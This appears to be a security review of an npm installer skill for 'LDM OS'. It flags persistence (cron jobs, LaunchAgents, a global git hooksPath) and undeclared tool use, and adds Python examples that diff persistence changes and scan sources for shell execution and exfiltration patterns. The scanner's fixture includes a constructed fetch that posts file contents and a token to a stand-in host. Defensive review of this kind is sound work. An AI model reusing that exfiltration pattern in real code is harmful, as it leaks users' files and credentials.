Detailed analysis
✓ Purpose and capabilities: Name/description, package install, and code files are coherent: this is an installer/updater for a local 'LDM OS', and the repo contains a CLI, an installer, docs, and deployment scripts. The required binaries (git, npm, node) are reasonable for an npm-based CLI installer.
⚠ Instruction scope: SKILL.md instructs the agent to run many system commands (which ldm, ldm status, ldm install, npm install -g, ldm init, ldm doctor) and to read local reference files shipped in the package. However, SKILL.md shows example commands that use the GitHub CLI ('gh release list', 'gh release view') while 'gh' is not listed among the required binaries. The instructions and changelog indicate that the installer deploys files into ~/.ldm/, writes deployed binaries to ~/.ldm/bin/, creates cron jobs or LaunchAgents, modifies global git hooks, and creates docs under the home directory. All of these change the user's environment and have side effects well beyond a simple CLI install. SKILL.md states 'Never touch sacred data', yet the changelogs describe aggressive update/deploy behaviour (scripts and backup checks deployed on every update) that warrants user review before running.
ℹ Install mechanism: Install uses an npm package (@wipcomputer/wip-ldm-os), a standard registry mechanism (moderate risk). The bundled code is large and includes shell scripts, cron hooks, a process monitor, and boot hooks that are written into the user's home directory. No downloads from arbitrary remote URLs appear in the metadata, but the package self-updates, can clone GitHub repos, and can install other extensions, which enlarges the blast radius of the trust placed in the registry and the authors.
⚠ Credential requirements: The skill declares no environment variables or credentials (primaryEnv: none), which matches the metadata. At runtime, however, it implicitly relies on user-local credentials and services: SSH keys (for private repos), the GitHub CLI (used in the instructions but not declared), global git configuration (it sets core.hooksPath), and cron/LaunchAgent privileges. The installer creates and manages persistent files under the home directory and, per the changelog, may read and write iCloud paths. These are powerful local privileges even without explicit secret env vars.
⚠ Persistence and permissions: The package is persistent: it installs a CLI binary, deploys files into ~/.ldm/, sets up cron jobs and a process monitor, and alters global git configuration (core.hooksPath → ~/.ldm/hooks). These are significant, lasting changes to the user's environment; in particular, a global core.hooksPath makes git use the package's hook directory in every repository on the machine, overriding each repository's own .git/hooks. The skill is not marked always:true, but its installer logic enlarges its footprint and its ongoing presence on the system.
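The findings above name four persistence surfaces the installer touches: the global core.hooksPath, files under ~/.ldm/, LaunchAgent plists, and crontab entries. The script below is an added example, not code from the package or its authors: it snapshots those surfaces before and after running the installer and reports what changed. It reads ~/.gitconfig with a minimal parser (quoted values, escapes and include directives are not handled), takes the crontab as the text of `crontab -l` so it runs offline, and the before/after contents built in demo() are constructed, not captured from a real install.

```python
"""Snapshot and diff the persistence surfaces a local installer can change.

Added example, not code from the package under review. Surfaces covered are
those named in the findings: global core.hooksPath in ~/.gitconfig, files
deployed under ~/.ldm/, LaunchAgent plists, and crontab entries. The crontab is
passed in as the text of `crontab -l` so the functions stay offline.
"""
import pathlib
import tempfile


def parse_git_config(text):
    """Minimal reader for git's INI-style config -> {'section.key': value}.
    Git treats section and key names case-insensitively, so both are lowercased.
    Simplification: quoted values, escapes and [include] directives are ignored."""
    out, section = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif "=" in line and section is not None:
            key, value = line.split("=", 1)
            out[f"{section}.{key.strip().lower()}"] = value.strip()
    return out


def snapshot(home, crontab_text=""):
    """Collect the current state of each persistence surface under `home`."""
    home = pathlib.Path(home)
    gitconfig = home / ".gitconfig"
    cfg = parse_git_config(gitconfig.read_text()) if gitconfig.is_file() else {}
    ldm = home / ".ldm"
    ldm_files = (sorted(p.relative_to(ldm).as_posix() for p in ldm.rglob("*") if p.is_file())
                 if ldm.is_dir() else [])
    agents = home / "Library" / "LaunchAgents"
    plists = sorted(p.name for p in agents.glob("*.plist")) if agents.is_dir() else []
    # Crontab lines, comments dropped, so the diff shows only real schedule entries.
    cron = sorted(l.strip() for l in crontab_text.splitlines()
                  if l.strip() and not l.lstrip().startswith("#"))
    return {"hooks_path": cfg.get("core.hookspath"), "ldm_files": ldm_files,
            "launch_agents": plists, "cron": cron}


def diff(before, after):
    """Human-readable list of what an install added or changed."""
    findings = []
    if before["hooks_path"] != after["hooks_path"]:
        findings.append(f"core.hooksPath changed: {before['hooks_path']!r} -> {after['hooks_path']!r}")
    for key in ("ldm_files", "launch_agents", "cron"):
        added = sorted(set(after[key]) - set(before[key]))
        if added:
            findings.append(f"{key} added: {added}")
    return findings


def demo():
    """Constructed scenario (not a real install): snapshot an empty HOME, plant the
    kind of artefacts the findings describe, snapshot again, and diff."""
    with tempfile.TemporaryDirectory() as home:
        before = snapshot(home, crontab_text="")
        h = pathlib.Path(home)
        (h / ".gitconfig").write_text("[user]\n\tname = example\n[core]\n\thooksPath = ~/.ldm/hooks\n")
        for rel in ("bin/ldm", "hooks/pre-commit"):
            p = h / ".ldm" / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text("#!/bin/sh\n")
        agents = h / "Library" / "LaunchAgents"
        agents.mkdir(parents=True)
        (agents / "com.example.ldm.monitor.plist").write_text("<plist/>")  # made-up label
        after = snapshot(home, crontab_text="# m h dom mon dow\n*/30 * * * * $HOME/.ldm/bin/ldm update\n")
        return diff(before, after)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Take a snapshot before `ldm install`, another afterwards, and review the diff before deciding what to keep. A changed core.hooksPath can be reverted with `git config --global --unset core.hooksPath`, which restores each repository's own .git/hooks; inspect ~/.ldm/hooks first, since while the setting is in place whatever is there runs for every hook event in every repository.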
⚠ bin/ldm.js:169: Shell command execution detected (child_process).
⚠ lib/bootstrap.mjs:18: Shell command execution detected (child_process).
⚠ lib/deploy.mjs:63: Shell command execution detected (child_process).
⚠ lib/state.mjs:92: Shell command execution detected (child_process).
⚠ lib/updates.mjs:131: Shell command execution detected (child_process).
⚠ src/bridge/core.ts:122: Shell command execution detected (child_process).
⚠ src/bridge/core.ts:15: Environment variable access combined with network send.
⚠ src/bridge/core.ts:5: File read combined with network send (possible exfiltration).
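The file:line findings above are produced by pattern matching over the package's sources. The scanner below is an added example, not the tool that generated this report (whose rules are not published); it reproduces the three finding types as approximate heuristics: a child_process call in a file that also imports child_process, process.env access in a file that also sends on the network, and a file read in a file that also sends on the network. The sample sources, their paths, line numbers and the LDM_TOKEN name are constructed for illustration and are not the package's real files.

```python
"""Minimal static scanner reproducing the three finding types in the report.

Added example, not the scanner that produced the report. Child_process calls are
only reported in files that import child_process, because RegExp.prototype.exec
would otherwise trigger the exec( pattern. The two "combined with network send"
findings are per-file co-occurrence checks anchored at the first matching line.
"""
import re

CP_IMPORT = re.compile(
    r"""require\(\s*['"](?:node:)?child_process['"]\s*\)|from\s+['"](?:node:)?child_process['"]"""
)
CP_CALL = re.compile(r"\b(?:exec|execSync|execFile|execFileSync|spawn|spawnSync)\s*\(")
ENV_ACCESS = re.compile(r"\bprocess\.env\b")
FILE_READ = re.compile(r"\b(?:readFile|readFileSync|createReadStream)\s*\(")
NET_SEND = re.compile(r"\b(?:fetch|https?\.(?:request|get)|axios\.(?:get|post|put|request))\s*\(")

CHILD_PROCESS_MSG = "Shell command execution detected (child_process)"
ENV_NET_MSG = "Environment variable access combined with network send"
FILE_NET_MSG = "File read combined with network send (possible exfiltration)"


def first_match(pattern, lines):
    """1-based number of the first line matching pattern, or None."""
    for n, line in enumerate(lines, 1):
        if pattern.search(line):
            return n
    return None


def scan_file(path, source):
    """Return (path, line, message) findings for one source file."""
    lines = source.splitlines()
    findings = []
    if CP_IMPORT.search(source):
        for n, line in enumerate(lines, 1):
            if CP_CALL.search(line):
                findings.append((path, n, CHILD_PROCESS_MSG))
    net_line = first_match(NET_SEND, lines)
    if net_line is not None:  # only a sink makes env/file reads suspicious here
        env_line = first_match(ENV_ACCESS, lines)
        if env_line is not None:
            findings.append((path, env_line, ENV_NET_MSG))
        read_line = first_match(FILE_READ, lines)
        if read_line is not None:
            findings.append((path, read_line, FILE_NET_MSG))
    return findings


def scan_sources(files):
    """files: {path: source}. Findings sorted by path, then line."""
    out = []
    for path, source in files.items():
        out.extend(scan_file(path, source))
    return sorted(out, key=lambda f: (f[0], f[1]))


# Constructed sample sources; paths and contents are made up, not the package's files.
SAMPLES = {
    "lib/run.mjs": """\
import { execSync } from 'node:child_process';
export function which(bin) {
  return execSync(`which ${bin}`).toString().trim();
}
""",
    "src/bridge/core.ts": """\
import fs from 'node:fs';
import { spawn } from 'node:child_process';
const token = process.env.LDM_TOKEN;
export async function report(path: string) {
  const body = fs.readFileSync(path, 'utf8');
  await fetch('https://example.invalid/report', { method: 'POST', body, headers: { authorization: token } });
}
export function run(cmd: string) { return spawn(cmd, { shell: true }); }
""",
    "lib/safe.js": """\
const re = /x/;
re.exec('y');
console.log(process.env.HOME);
""",
}

if __name__ == "__main__":
    for path, line, msg in scan_sources(SAMPLES):
        print(f"{path}:{line} {msg}")
```

lib/safe.js produces nothing: its exec( is a RegExp call in a file with no child_process import, and its process.env read has no network sink in the same file. A per-file co-occurrence rule still says nothing about data flow, so a real src/bridge/core.ts finding of this shape needs a manual read of what is actually sent and to where.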